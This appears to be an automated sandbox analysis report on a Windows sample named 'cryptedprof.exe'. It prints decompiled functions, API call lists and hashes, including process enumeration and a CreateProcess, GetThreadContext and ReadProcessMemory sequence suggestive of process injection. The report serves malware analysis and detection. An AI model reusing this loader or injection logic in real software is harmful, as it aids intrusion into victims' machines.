                                                                                        0x6fc242f7
                                                                                        0x6fc242fb
                                                                                        0x6fc242ff
                                                                                        0x6fc24303
                                                                                        0x6fc24307
                                                                                        0x6fc2430b
                                                                                        0x6fc2430f
                                                                                        0x6fc24313
                                                                                        0x6fc24317
                                                                                        0x6fc2431b
                                                                                        0x6fc2431f
                                                                                        0x6fc24323
                                                                                        0x6fc24327
                                                                                        0x6fc2432b
                                                                                        0x6fc2432f
                                                                                        0x6fc24333
                                                                                        0x6fc24337
                                                                                        0x6fc2433b
                                                                                        0x6fc2433f
                                                                                        0x6fc24343
                                                                                        0x6fc24347
                                                                                        0x6fc2434b
                                                                                        0x6fc2434f
                                                                                        0x6fc24353
                                                                                        0x6fc24357
                                                                                        0x6fc2435b
                                                                                        0x6fc24364
                                                                                        0x6fc24374
                                                                                        0x6fc24384
                                                                                        0x6fc24394
                                                                                        0x6fc243a4
                                                                                        0x6fc243b4
                                                                                        0x6fc243c4
                                                                                        0x6fc243d4
                                                                                        0x6fc243e4
                                                                                        0x6fc243f4
                                                                                        0x6fc24404
                                                                                        0x6fc24414
                                                                                        0x6fc24417
                                                                                        0x6fc2441e
                                                                                        0x6fc24425
                                                                                        0x6fc2442c
                                                                                        0x6fc24435
                                                                                        0x6fc2443d
                                                                                        0x6fc24442
                                                                                        0x6fc24444
                                                                                        0x6fc2447e
                                                                                        0x6fc24483
                                                                                        0x6fc24486
                                                                                        0x6fc24494
                                                                                        0x6fc244ac
                                                                                        0x6fc244af
                                                                                        0x6fc244b6
                                                                                        0x6fc244c2
                                                                                        0x6fc244c5
                                                                                        0x6fc244c8
                                                                                        0x6fc244cc
                                                                                        0x6fc244df
                                                                                        0x6fc244e2
                                                                                        0x6fc244e5
                                                                                        0x6fc244e9
                                                                                        0x6fc244ff
                                                                                        0x6fc24502
                                                                                        0x6fc24504
                                                                                        0x6fc2450a
                                                                                        0x6fc24511
                                                                                        0x6fc24519
                                                                                        0x6fc2451e
                                                                                        0x6fc24520
                                                                                        0x6fc24527
                                                                                        0x6fc24533
                                                                                        0x6fc24541
                                                                                        0x6fc2456b
                                                                                        0x6fc2456e
                                                                                        0x6fc24570
                                                                                        0x6fc24574
                                                                                        0x6fc24574
                                                                                        0x6fc24570
                                                                                        0x6fc24579
                                                                                        0x6fc24579
                                                                                        0x00000000
                                                                                        0x6fc24504
                                                                                        0x00000000
                                                                                        0x6fc244e9
                                                                                        0x00000000
                                                                                        0x6fc244cc
                                                                                        0x00000000
                                                                                        0x6fc244b6
                                                                                        0x6fc24448
                                                                                        0x6fc24450
                                                                                        0x6fc24455
                                                                                        0x6fc24457
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x6fc2445b
                                                                                        0x6fc24462
                                                                                        0x6fc24467
                                                                                        0x6fc24469
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x6fc2446d
                                                                                        0x6fc24475
                                                                                        0x6fc2447c
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000

                                                                                        APIs
                                                                                          • Part of subcall function 6FC2421B: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,873D1860,?,5C7BF6E9,?,EA31D3B6), ref: 6FC24260
                                                                                        • CreateFileW.KERNELBASE(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 6FC244AC
                                                                                          • Part of subcall function 6FC2421B: Process32FirstW.KERNEL32(000000FF,0000022C), ref: 6FC24284
                                                                                        • VirtualAlloc.KERNELBASE(00000000,000000FF,00003000,00000004), ref: 6FC244DF
                                                                                          • Part of subcall function 6FC2421B: Process32NextW.KERNEL32(000000FF,0000022C), ref: 6FC242AF
                                                                                        • ReadFile.KERNELBASE(000000FF,00000000,000000FF,00000000,00000000), ref: 6FC244FF
                                                                                        • ExitProcess.KERNEL32(00000000,00000000), ref: 6FC24579
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.336002347.000000006FC23000.00000040.00020000.sdmp, Offset: 6FC20000, based on PE: true
                                                                                        • Associated: 00000001.00000002.335954457.000000006FC20000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.335970994.000000006FC21000.00000080.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.335995426.000000006FC22000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.336018479.000000006FC25000.00000002.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: CreateFileProcess32$AllocExitFirstNextProcessReadSnapshotToolhelp32Virtual
                                                                                        • String ID: a62ab1744baf4ecdba323e65b950ba37
                                                                                        • API String ID: 1567874941-778335501
                                                                                        • Opcode ID: fdcccdf1bb3976d6cc8d99eb04027da88de56eb45701c987bb00351068814252
                                                                                        • Instruction ID: 22de150b6c85ad8c3aa3ef837bfac7901c50cf7e019beeaec03f415fcf4e272f
                                                                                        • Opcode Fuzzy Hash: fdcccdf1bb3976d6cc8d99eb04027da88de56eb45701c987bb00351068814252
                                                                                        • Instruction Fuzzy Hash: 47913530D44388EAEF129BE4DC09BDDBFB5BF04709F1440A5E640BA1D2E7B60A59CB25
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 004032BF, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 101COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 93%
                                                                                        			E004032BF(intOrPtr _a4) {
				intOrPtr _t11;
				signed int _t12;
				void* _t15;
				long _t16;
				void* _t18;
				intOrPtr _t30;
				intOrPtr _t33;
				intOrPtr _t35;
				void* _t36;
				intOrPtr _t48;

				_t33 =  *0x429464 -  *0x40b898 + _a4;
				 *0x42f450 = GetTickCount() + 0x1f4;
				if(_t33 <= 0) {
					L22:
					E00402E52(1);
					return 0;
				}
				E0040343E( *0x429474);
				SetFilePointer( *0x40a01c,  *0x40b898, 0, 0); // executed
				 *0x429470 = _t33;
				 *0x429460 = 0;
				while(1) {
					_t30 = 0x4000;
					_t11 =  *0x429468 -  *0x429474;
					if(_t11 <= 0x4000) {
						_t30 = _t11;
					}
					_t12 = E00403428(0x41d460, _t30);
					if(_t12 == 0) {
						break;
					}
					 *0x429474 =  *0x429474 + _t30;
					 *0x40b8a0 = 0x41d460;
					 *0x40b8a4 = _t30;
					L6:
					L6:
					if( *0x42f454 != 0 &&  *0x42f500 == 0) {
						 *0x429460 =  *0x429470 -  *0x429464 - _a4 +  *0x40b898;
						E00402E52(0);
					}
					 *0x40b8a8 = 0x415460;
					 *0x40b8ac = 0x8000;
					if(E0040677B(?str?) < 0) {
						goto L20;
					}
					_t35 =  *0x40b8a8; // 0x41797f
					_t36 = _t35 - 0x415460;
					if(_t36 == 0) {
						__eflags =  *0x40b8a4; // 0x0
						if(__eflags != 0) {
							goto L20;
						}
						__eflags = _t30;
						if(_t30 == 0) {
							goto L20;
						}
						L16:
						_t16 =  *0x429464;
						if(_t16 -  *0x40b898 + _a4 > 0) {
							continue;
						}
						SetFilePointer( *0x40a01c, _t16, 0, 0); // executed
						goto L22;
					}
					_t18 = E00405E8D( *0x40a01c, 0x415460, _t36); // executed
					if(_t18 == 0) {
						_push(0xfffffffe);
						L21:
						_pop(_t15);
						return _t15;
					}
					 *0x40b898 =  *0x40b898 + _t36;
					_t48 =  *0x40b8a4; // 0x0
					if(_t48 != 0) {
						goto L6;
					}
					goto L16;
					L20:
					_push(0xfffffffd);
					goto L21;
				}
				return _t12 | 0xffffffff;
			}













                                                                                        0x004032cf
                                                                                        0x004032e2
                                                                                        0x004032e7
                                                                                        0x00403417
                                                                                        0x00403419
                                                                                        0x00000000
                                                                                        0x0040341f
                                                                                        0x004032f3
                                                                                        0x00403306
                                                                                        0x0040330c
                                                                                        0x00403312
                                                                                        0x0040331d
                                                                                        0x00403322
                                                                                        0x00403327
                                                                                        0x0040332f
                                                                                        0x00403331
                                                                                        0x00403331
                                                                                        0x0040333a
                                                                                        0x00403341
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00403347
                                                                                        0x0040334d
                                                                                        0x00403353
                                                                                        0x00000000
                                                                                        0x00403359
                                                                                        0x0040335f
                                                                                        0x0040337f
                                                                                        0x00403384
                                                                                        0x00403389
                                                                                        0x0040338f
                                                                                        0x00403395
                                                                                        0x004033a6
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x004033a8
                                                                                        0x004033ae
                                                                                        0x004033b0
                                                                                        0x004033d3
                                                                                        0x004033d9
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x004033db
                                                                                        0x004033dd
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x004033df
                                                                                        0x004033df
                                                                                        0x004033f2
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00403401
                                                                                        0x00000000
                                                                                        0x00403401
                                                                                        0x004033ba
                                                                                        0x004033c1
                                                                                        0x0040340e
                                                                                        0x00403414
                                                                                        0x00403414
                                                                                        0x00000000
                                                                                        0x00403414
                                                                                        0x004033c3
                                                                                        0x004033c9
                                                                                        0x004033cf
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00403412
                                                                                        0x00403412
                                                                                        0x00000000
                                                                                        0x00403412
                                                                                        0x00000000

                                                                                        APIs
                                                                                        • GetTickCount.KERNEL32 ref: 004032D3
                                                                                          • Part of subcall function 0040343E: SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040313E,?), ref: 0040344C
                                                                                        • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,004031E9,00000004,00000000,00000000,?,?,00403165,000000FF,00000000,00000000,0040A130,?), ref: 00403306
                                                                                        • SetFilePointer.KERNELBASE(?,00000000,00000000,NA,0041D460,00004000,?,00000000,004031E9,00000004,00000000,00000000,?,?,00403165,000000FF), ref: 00403401
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.334715808.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.334705910.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334725747.0000000000408000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334731903.000000000040A000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334747539.000000000041D000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334754170.000000000042C000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334759137.0000000000435000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334765630.0000000000438000.00000002.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: FilePointer$CountTick
                                                                                        • String ID: NA$`TA
                                                                                        • API String ID: 1092082344-131641330
                                                                                        • Opcode ID: ddf88972be424b0b842bd0ca3aed5b91ca801b40ce3928dce7bc125f03cf72b3
                                                                                        • Instruction ID: bb82d22d1a80a93a7495f99719332701a8bc5653d470bc60fdd2df8261a6fa09
                                                                                        • Opcode Fuzzy Hash: ddf88972be424b0b842bd0ca3aed5b91ca801b40ce3928dce7bc125f03cf72b3
                                                                                        • Instruction Fuzzy Hash: 3A31B3726042159FDB10BF29EE849263BACFB40359B88813BE405B62F1C7785C428A9D
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00405E15, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 100%
                                                                                        			E00405E15(char _a4, intOrPtr _a6, CHAR* _a8) {
				char _t11;
				signed int _t12;
				int _t15;
				signed int _t17;
				void* _t20;
				CHAR* _t21;

				_t21 = _a4;
				_t20 = 0x64;
				while(1) {
					_t11 =  *0x40a3ec; // 0x61736e
					_t20 = _t20 - 1;
					_a4 = _t11;
					_t12 = GetTickCount();
					_t17 = 0x1a;
					_a6 = _a6 + _t12 % _t17;
					_t15 = GetTempFileNameA(_a8,  &_a4, 0, _t21); // executed
					if(_t15 != 0) {
						break;
					}
					if(_t20 != 0) {
						continue;
					}
					 *_t21 =  *_t21 & 0x00000000;
					return _t15;
				}
				return _t21;
			}









                                                                                        0x00405e19
                                                                                        0x00405e1f
                                                                                        0x00405e20
                                                                                        0x00405e20
                                                                                        0x00405e25
                                                                                        0x00405e26
                                                                                        0x00405e29
                                                                                        0x00405e33
                                                                                        0x00405e40
                                                                                        0x00405e43
                                                                                        0x00405e4b
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00405e4f
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00405e51
                                                                                        0x00000000
                                                                                        0x00405e51
                                                                                        0x00000000

                                                                                        APIs
                                                                                        • GetTickCount.KERNEL32 ref: 00405E29
                                                                                        • GetTempFileNameA.KERNELBASE(?,?,00000000,?,?,00000007,00000009,0000000B), ref: 00405E43
                                                                                        Strings
                                                                                        • nsa, xrefs: 00405E20
                                                                                        • "C:\Users\user\Desktop\cryptedprof.exe" , xrefs: 00405E15
                                                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00405E18
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.334715808.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.334705910.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334725747.0000000000408000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334731903.000000000040A000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334747539.000000000041D000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334754170.000000000042C000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334759137.0000000000435000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334765630.0000000000438000.00000002.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: CountFileNameTempTick
                                                                                        • String ID: "C:\Users\user\Desktop\cryptedprof.exe" $C:\Users\user\AppData\Local\Temp\$nsa
                                                                                        • API String ID: 1716503409-2530712695
                                                                                        • Opcode ID: 6f67c72f8a62f6904c1c8d13d4c39cdc389fdf02a571d79ef00f96109094c4c4
                                                                                        • Instruction ID: 94097d04b6c38ee8b1870d6a931f35239ed30ef0cd20ec9d97f11959184772c3
                                                                                        • Opcode Fuzzy Hash: 6f67c72f8a62f6904c1c8d13d4c39cdc389fdf02a571d79ef00f96109094c4c4
                                                                                        • Instruction Fuzzy Hash: E4F0A7363442087BDB109F55EC44B9B7B9DDF91750F14C03BF984DA1C0D6B0D9988798
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 709916DB, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 120COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 94%
                                                                                        			E709916DB(void* __edx, void* __edi, void* __esi, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				void _v36;
				char _v88;
				struct HINSTANCE__* _t37;
				intOrPtr _t42;
				void* _t48;
				void* _t49;
				void* _t50;
				void* _t54;
				intOrPtr _t57;
				signed int _t61;
				signed int _t63;
				void* _t67;
				void* _t68;
				void* _t72;
				void* _t76;

				_t76 = __esi;
				_t68 = __edi;
				_t67 = __edx;
				 *0x7099405c = _a8;
				 *0x70994060 = _a16;
				 *0x70994064 = _a12;
				 *((intOrPtr*)(_a20 + 0xc))( *0x70994038, E70991556);
				_push(1); // executed
				_t37 = E70991A98(); // executed
				_t54 = _t37;
				if(_t54 == 0) {
					L28:
					return _t37;
				} else {
					if( *((intOrPtr*)(_t54 + 4)) != 1) {
						E709922AF(_t54);
					}
					E709922F1(_t67, _t54);
					_t57 =  *((intOrPtr*)(_t54 + 4));
					if(_t57 == 0xffffffff) {
						L14:
						if(( *(_t54 + 0x810) & 0x00000004) == 0) {
							if( *((intOrPtr*)(_t54 + 4)) == 0) {
								_t37 = E709924D8(_t54);
							} else {
								_push(_t76);
								_push(_t68);
								_t61 = 8;
								_t13 = _t54 + 0x818; // 0x818
								memcpy( &_v36, _t13, _t61 << 2);
								_t42 = E7099156B(_t54,  &_v88);
								 *(_t54 + 0x834) =  *(_t54 + 0x834) & 0x00000000;
								_t18 = _t54 + 0x818; // 0x818
								_t72 = _t18;
								 *((intOrPtr*)(_t54 + 0x820)) = _t42;
								 *_t72 = 3;
								E709924D8(_t54);
								_t63 = 8;
								_t37 = memcpy(_t72,  &_v36, _t63 << 2);
							}
						} else {
							E709924D8(_t54);
							_t37 = GlobalFree(E70991266(E70991559(_t54)));
						}
						if( *((intOrPtr*)(_t54 + 4)) != 1) {
							_t37 = E7099249E(_t54);
							if(( *(_t54 + 0x810) & 0x00000040) != 0 &&  *_t54 == 1) {
								_t37 =  *(_t54 + 0x808);
								if(_t37 != 0) {
									_t37 = FreeLibrary(_t37);
								}
							}
							if(( *(_t54 + 0x810) & 0x00000020) != 0) {
								_t37 = E709914E2( *0x70994058);
							}
						}
						if(( *(_t54 + 0x810) & 0x00000002) != 0) {
							goto L28;
						} else {
							return GlobalFree(_t54);
						}
					}
					_t48 =  *_t54;
					if(_t48 == 0) {
						if(_t57 != 1) {
							goto L14;
						}
						E70992CC3(_t54);
						L12:
						_t54 = _t48;
						L13:
						goto L14;
					}
					_t49 = _t48 - 1;
					if(_t49 == 0) {
						L8:
						_t48 = E70992A38(_t57, _t54); // executed
						goto L12;
					}
					_t50 = _t49 - 1;
					if(_t50 == 0) {
						E709926B2(_t54);
						goto L13;
					}
					if(_t50 != 1) {
						goto L14;
					}
					goto L8;
				}
			}


















                                                                                        0x709916db
                                                                                        0x709916db
                                                                                        0x709916db
                                                                                        0x709916e5
                                                                                        0x709916ed
                                                                                        0x709916fa
                                                                                        0x70991708
                                                                                        0x7099170b
                                                                                        0x7099170d
                                                                                        0x70991712
                                                                                        0x70991717
                                                                                        0x70991836
                                                                                        0x70991836
                                                                                        0x7099171d
                                                                                        0x70991721
                                                                                        0x70991724
                                                                                        0x70991729
                                                                                        0x7099172b
                                                                                        0x70991731
                                                                                        0x70991737
                                                                                        0x70991767
                                                                                        0x7099176e
                                                                                        0x70991792
                                                                                        0x709917dd
                                                                                        0x70991794
                                                                                        0x70991794
                                                                                        0x70991795
                                                                                        0x7099179b
                                                                                        0x7099179c
                                                                                        0x709917a6
                                                                                        0x709917a9
                                                                                        0x709917ae
                                                                                        0x709917b5
                                                                                        0x709917b5
                                                                                        0x709917bc
                                                                                        0x709917c2
                                                                                        0x709917c8
                                                                                        0x709917d5
                                                                                        0x709917d6
                                                                                        0x709917d9
                                                                                        0x70991770
                                                                                        0x70991771
                                                                                        0x70991786
                                                                                        0x70991786
                                                                                        0x709917e7
                                                                                        0x709917ea
                                                                                        0x709917f7
                                                                                        0x709917fe
                                                                                        0x70991806
                                                                                        0x70991809
                                                                                        0x70991809
                                                                                        0x70991806
                                                                                        0x70991816
                                                                                        0x7099181e
                                                                                        0x70991823
                                                                                        0x70991816
                                                                                        0x7099182b
                                                                                        0x00000000
                                                                                        0x7099182d
                                                                                        0x00000000
                                                                                        0x7099182e
                                                                                        0x7099182b
                                                                                        0x7099173b
                                                                                        0x7099173e
                                                                                        0x7099175c
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x7099175f
                                                                                        0x70991764
                                                                                        0x70991764
                                                                                        0x70991766
                                                                                        0x00000000
                                                                                        0x70991766
                                                                                        0x70991740
                                                                                        0x70991741
                                                                                        0x70991749
                                                                                        0x7099174a
                                                                                        0x00000000
                                                                                        0x7099174a
                                                                                        0x70991743
                                                                                        0x70991744
                                                                                        0x70991752
                                                                                        0x00000000
                                                                                        0x70991752
                                                                                        0x70991747
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x70991747

                                                                                        APIs
                                                                                          • Part of subcall function 70991A98: GlobalFree.KERNEL32 ref: 70991D09
                                                                                          • Part of subcall function 70991A98: GlobalFree.KERNEL32 ref: 70991D0E
                                                                                          • Part of subcall function 70991A98: GlobalFree.KERNEL32 ref: 70991D13
                                                                                        • GlobalFree.KERNEL32 ref: 70991786
                                                                                        • FreeLibrary.KERNEL32(?), ref: 70991809
                                                                                        • GlobalFree.KERNEL32 ref: 7099182E
                                                                                          • Part of subcall function 709922AF: GlobalAlloc.KERNEL32(00000040,?), ref: 709922E0
                                                                                          • Part of subcall function 709926B2: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,70991757,00000000), ref: 70992782
                                                                                          • Part of subcall function 7099156B: wsprintfA.USER32 ref: 70991599
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.336061251.0000000070991000.00000020.00020000.sdmp, Offset: 70990000, based on PE: true
                                                                                        • Associated: 00000001.00000002.336043646.0000000070990000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.336078624.0000000070993000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.336140762.0000000070995000.00000002.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: Global$Free$Alloc$Librarywsprintf
                                                                                        • String ID:
                                                                                        • API String ID: 3962662361-3916222277
                                                                                        • Opcode ID: 5bee8ac8f63320ca8735f6739b0b2e3553be0ff2c4e53b1ce5b957ddf4688833
                                                                                        • Instruction ID: e49e9e36cb9c0f6906f724e2a5ae87d3cbec3a7df2cba9951ddbc0250f6609be
                                                                                        • Opcode Fuzzy Hash: 5bee8ac8f63320ca8735f6739b0b2e3553be0ff2c4e53b1ce5b957ddf4688833
                                                                                        • Instruction Fuzzy Hash: 0D41C272120205DFCB019FA5CD85BDE37ACBBC4218F148439F907AA296DB74A845D7AB
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 6FC23034, Relevance: 6.6, APIs: 4, Instructions: 552processthreadCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CreateProcessW.KERNELBASE(?,00000000), ref: 6FC23373
                                                                                        • GetThreadContext.KERNELBASE(?,00010007), ref: 6FC23396
                                                                                        • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 6FC233BA
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.336002347.000000006FC23000.00000040.00020000.sdmp, Offset: 6FC20000, based on PE: true
                                                                                        • Associated: 00000001.00000002.335954457.000000006FC20000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.335970994.000000006FC21000.00000080.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.335995426.000000006FC22000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.336018479.000000006FC25000.00000002.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: Process$ContextCreateMemoryReadThread
                                                                                        • String ID:
                                                                                        • API String ID: 2411489757-0
                                                                                        • Opcode ID: e6c65b1ebc359eaacaabdb592bb0af93d2cdddc828e0198a0abb3b7374f1df7b
                                                                                        • Instruction ID: 35e0d667786c4a0af5142887ccbb60df88795cf57bf78aa717b8ff7b1ed783d7
                                                                                        • Opcode Fuzzy Hash: e6c65b1ebc359eaacaabdb592bb0af93d2cdddc828e0198a0abb3b7374f1df7b
                                                                                        • Instruction Fuzzy Hash: 57320831D40208EEEB10CFA4DC56BEDB7B5FF04705F20449AE618FA2A0E7759A84CB15
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0040209D, Relevance: 6.1, APIs: 4, Instructions: 73libraryloaderCOMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 60%
                                                                                        			E0040209D(void* __ebx, void* __eflags) {
				struct HINSTANCE__* _t18;
				struct HINSTANCE__* _t26;
				void* _t27;
				struct HINSTANCE__* _t30;
				CHAR* _t32;
				intOrPtr* _t33;
				void* _t34;

				_t27 = __ebx;
				asm("sbb eax, 0x42f518");
				 *(_t34 - 4) = 1;
				if(__eflags < 0) {
					_push(0xffffffe7);
					L15:
					E00401423();
					L16:
					 *0x42f4e8 =  *0x42f4e8 +  *(_t34 - 4);
					return 0;
				}
				_t32 = E00402BCE(0xfffffff0);
				 *(_t34 + 8) = E00402BCE(1);
				if( *((intOrPtr*)(_t34 - 0x18)) == __ebx) {
					L3:
					_t18 = LoadLibraryExA(_t32, _t27, 8); // executed
					_t30 = _t18;
					if(_t30 == _t27) {
						_push(0xfffffff6);
						goto L15;
					}
					L4:
					_t33 = GetProcAddress(_t30,  *(_t34 + 8));
					if(_t33 == _t27) {
						E00405374(0xfffffff7,  *(_t34 + 8));
					} else {
						 *(_t34 - 4) = _t27;
						if( *((intOrPtr*)(_t34 - 0x20)) == _t27) {
							 *_t33( *((intOrPtr*)(_t34 - 8)), 0x400, 0x430000, 0x40b890, 0x40a000); // executed
						} else {
							E00401423( *((intOrPtr*)(_t34 - 0x20)));
							if( *_t33() != 0) {
								 *(_t34 - 4) = 1;
							}
						}
					}
					if( *((intOrPtr*)(_t34 - 0x1c)) == _t27 && E00403A00(_t30) != 0) {
						FreeLibrary(_t30);
					}
					goto L16;
				}
				_t26 = GetModuleHandleA(_t32); // executed
				_t30 = _t26;
				if(_t30 != __ebx) {
					goto L4;
				}
				goto L3;
			}










                                                                                        0x0040209d
                                                                                        0x0040209d
                                                                                        0x004020a2
                                                                                        0x004020a9
                                                                                        0x00402164
                                                                                        0x004022dd
                                                                                        0x004022dd
                                                                                        0x00402a5a
                                                                                        0x00402a5d
                                                                                        0x00402a69
                                                                                        0x00402a69
                                                                                        0x004020b8
                                                                                        0x004020c2
                                                                                        0x004020c5
                                                                                        0x004020d4
                                                                                        0x004020d8
                                                                                        0x004020de
                                                                                        0x004020e2
                                                                                        0x0040215d
                                                                                        0x00000000
                                                                                        0x0040215d
                                                                                        0x004020e4
                                                                                        0x004020ed
                                                                                        0x004020f1
                                                                                        0x00402135
                                                                                        0x004020f3
                                                                                        0x004020f6
                                                                                        0x004020f9
                                                                                        0x00402129
                                                                                        0x004020fb
                                                                                        0x004020fe
                                                                                        0x00402107
                                                                                        0x00402109
                                                                                        0x00402109
                                                                                        0x00402107
                                                                                        0x004020f9
                                                                                        0x0040213d
                                                                                        0x00402152
                                                                                        0x00402152
                                                                                        0x00000000
                                                                                        0x0040213d
                                                                                        0x004020c8
                                                                                        0x004020ce
                                                                                        0x004020d2
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000

                                                                                        APIs
                                                                                        • GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 004020C8
                                                                                          • Part of subcall function 00405374: lstrlenA.KERNEL32(0042A098,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EC9,00000000,?), ref: 004053AD
                                                                                          • Part of subcall function 00405374: lstrlenA.KERNEL32(00402EC9,0042A098,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EC9,00000000), ref: 004053BD
                                                                                          • Part of subcall function 00405374: lstrcatA.KERNEL32(0042A098,00402EC9,00402EC9,0042A098,00000000,00000000,00000000), ref: 004053D0
                                                                                          • Part of subcall function 00405374: SetWindowTextA.USER32(0042A098,0042A098), ref: 004053E2
                                                                                          • Part of subcall function 00405374: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405408
                                                                                          • Part of subcall function 00405374: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405422
                                                                                          • Part of subcall function 00405374: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405430
                                                                                        • LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 004020D8
                                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 004020E8
                                                                                        • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 00402152
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.334715808.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.334705910.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334725747.0000000000408000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334731903.000000000040A000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334747539.000000000041D000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334754170.000000000042C000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334759137.0000000000435000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334765630.0000000000438000.00000002.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                                                        • String ID:
                                                                                        • API String ID: 2987980305-0
                                                                                        • Opcode ID: 6a921a9c7452e1760777dbc31a04e178e7c47593061c3139424f045b80a43029
                                                                                        • Instruction ID: e3fe6dffd4d776efa863efd9403cf6e1974d247a329121c392e1043855ccd094
                                                                                        • Opcode Fuzzy Hash: 6a921a9c7452e1760777dbc31a04e178e7c47593061c3139424f045b80a43029
                                                                                        • Instruction Fuzzy Hash: 2721EE32A00115EBCF20BF648F49B9F76B1AF14359F20423BF651B61D1CBBC49829A5D
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 004015BB, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 87%
                                                                                        			E004015BB(char __ebx, void* __eflags) {
				void* _t13;
				int _t19;
				char _t21;
				void* _t22;
				char _t23;
				signed char _t24;
				char _t26;
				CHAR* _t28;
				char* _t32;
				void* _t33;

				_t26 = __ebx;
				_t28 = E00402BCE(0xfffffff0);
